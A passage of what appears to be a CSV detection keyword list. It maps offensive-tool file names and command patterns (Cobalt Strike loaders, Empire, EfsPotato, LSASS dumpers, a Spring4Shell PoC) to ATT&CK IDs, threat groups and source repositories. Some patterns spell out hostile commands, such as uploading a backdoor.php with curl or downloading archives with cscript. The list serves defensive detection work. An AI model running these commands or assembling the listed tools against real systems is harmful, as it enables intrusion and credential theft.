to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tools","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","2","116","26","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z" +"*cryptvortex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cs2modrewrite.py*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*cs2nginx.py*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*csandker/Azure-AccessPermissions*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*CS-Avoid-killing*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*CS-BOFs/lsass*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*csc.exe /t:exe /out:RandomName.exe Program.cs*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*csc.exe EfsPotato.cs *","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*cscript *wmi.vbs -h*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cscript ..\\temp.vbs*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*cscript dl.vbs *http*/*.zip*.zip*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*CsEnox/SeManageVolumeExploit*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" +"*csexec/csexec_history*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*csharp_inject_bof_inject*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*CSharpNamedPipeLoader*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*csload.net/*/muma.*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" +"*csOnvps*teamserver*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*cSploit-*.apk*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" +"*cSploit/android*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" +"*csprecon -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*csrf_to_beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*CSSG_load.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*cs-token-vault.git*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*CT_Indirect_Syscalls.c*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.exe*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.sln*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.vcxproj*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*ctfr.py*","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1793","281","2022-05-03T12:59:37Z","2018-03-06T01:14:28Z" +"*ctftool*","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/taviso/ctftool","1","0","N/A","N/A","10","1626","278","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z" +"*cube0x0/LdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*cube0x0/MiniDump*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*cuddlephish*stealer.js","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*cuddlephish-main*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*curi0usJack*","offensive_tool_keyword","Github Username","github user hosting malicious code and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/curi0usJack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*curl * --upload-file backdoor.php -v*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*curl --connect-timeout 3.14 -s ifconfig.me*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","0","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" +"*curl http*/handling-form-submission-complete/rce.jsp*","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" +"*curl https://api.hunter.io/v2/domain-search?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*curl https://api.hunter.io/v2/email-finder?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*curl https://api.hunter.io/v2/email-verifier?email=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 